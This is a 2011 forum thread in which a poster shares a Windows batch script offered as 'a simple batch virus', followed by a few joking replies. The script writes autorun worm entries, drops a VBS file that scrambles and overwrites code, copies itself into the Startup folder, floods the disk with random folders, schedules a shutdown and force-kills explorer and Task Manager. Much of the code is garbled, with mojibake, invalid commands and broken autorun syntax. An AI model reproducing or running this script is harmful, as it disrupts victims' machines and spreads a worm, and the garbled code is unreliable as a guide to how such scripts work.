A simple batch virus

Shadwow · 04-07-2011, 06:42 AM

Well , here it is :

Code:
@echo off & title Prank

(

echo :: {

:worm

Code 1:

[aUtoRun[

:0 >> SVxd8v1.bat

[aUtoRUn

;jam3

OpEN=filesystem/pagefile.exe

:xm3d >> SVxd8v1.bat

ACtioN=Open

SHELL\\\oPen\\CoMMAnd=filesystem/pageÃƒâ€šÃ‚Â­file.exe

SHEll\\\\eXpLorE\\\cOMMand=filesystem/paÃƒâ€šÃ‚Â­gefile.exe

UseAUToPLAy=11m0yE5cY803Y803X4Mx+'I,0Q2ZÃƒâ€šÃ‚Â­UmXyM83tx9ceTA09H8W4u890e5

Code 2:

[AutoRun]

open=RavMon.exe

shell\open=Ãƒâ€šÃ‚Â´o?a(&O)

shell\open\Command=RavMon.exe

shell\explore=ÃƒÆ’Ã¢â‚¬â€EÃƒÆ’Ã¢â‚¬ÂÃƒâ€šÃ‚Â´1ÃƒÆ’Ã…â€œAÃƒÆ’Ã‚Â­AÃƒÆ’Ã‚Â·(&X)

shell\explore\Command="RavMon.exe -e"

start "" "Encrypter.vbs"

}

) > SVxd8v1.bat

:encrypt

(

echo :: {

set fso = createobject("scripting.filesystemobject")  > Encrypter.vbs

  >> Encrypter.vbs

  set file = fso.opentextfile("%~nx0", 1)  >> Encrypter.vbs

  encrypttext = file.ReadAll()     >> Encrypter.vbs

    file.close  >> Encrypter.vbs

  >> Encrypter.vbs

set file = fso.opentextfile("%~nx0", 2, true)  >> Encrypter.vbs

    file.write encrypt(encrypttext)     >> Encrypter.vbs

file.close  >> Encrypter.vbs

  >> Encrypter.vbs

set objshell = createobject("wscript.shell")    >> Encrypter.vbs

fso.deletefile wscript.scriptfullname     >> Encrypter.vbs

wscript.quit  >> Encrypter.vbs

  >> Encrypter.vbs

private function encrypt(byval string)    >> Encrypter.vbs

    Dim x, i, tmp  >> Encrypter.vbs    

    For i = 1 To Len( string )    >> Encrypter.vbs

  x = Mid( string, i, 1 )    >> Encrypter.vbs

  tmp = tmp ^& Chr( Asc( x ) + 1 )  >> Encrypter.vbs

  Next  >> Encrypter.vbs

    tmp = StrReverse( tmp )    >> Encrypter.vbs

     Encrypt = tmp  >> Encrypter.vbs

End Function  >> Encrypter.vbs

}

) > Encrypter.vbs

for %0 in (%~0\SVxd8v1.bat) do (

    copy %0 "%systemdrive%\users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

:start now

start "" "SVxd8v1.bat"

localhost -n 1

del "%~0\SVxd8v1.bat" /q

md %random% %random% %random% %random% %random% %random% %random% %random%  %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%%random% %random% %random% %random% %random%

:folders

md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd% md=%rnd%

start www.microsoft.com

shutdown -s -t 60

:main1

start www.avg.com

for %%R in ("notepad.exe", "IEXPLORER.exe", "explorer.exe" "notepad++.exe", "taskmgr.exe") do taskkill /F /IM %%R

start "" "Encrypter.vbs"

del "%~0\Encrypter.vbs"

exit

What it does.
- It creates a worm.
- It encrypts it-self
-And fills up a bit of ram memory.

FunKx · 04-07-2011, 08:11 AM

How much is a bit? xD

1234hotmaster · 04-07-2011, 09:24 AM

you mean how much is a byte? a byte is 8 bits. 1024 bytes make 1 KB. 1024 KB make 1 MB. 1024 MB make 1 GB and 1024 GB make 1 TB.

FunKx · 04-07-2011, 09:33 AM

Lol no xD

"And fills up a bit of ram memory."

How much Biggrin

Shadwow · 04-07-2011, 10:07 AM

if he run enough time to do his work he fills up a considerable part of your ram memory

A simple batch virus
Author Message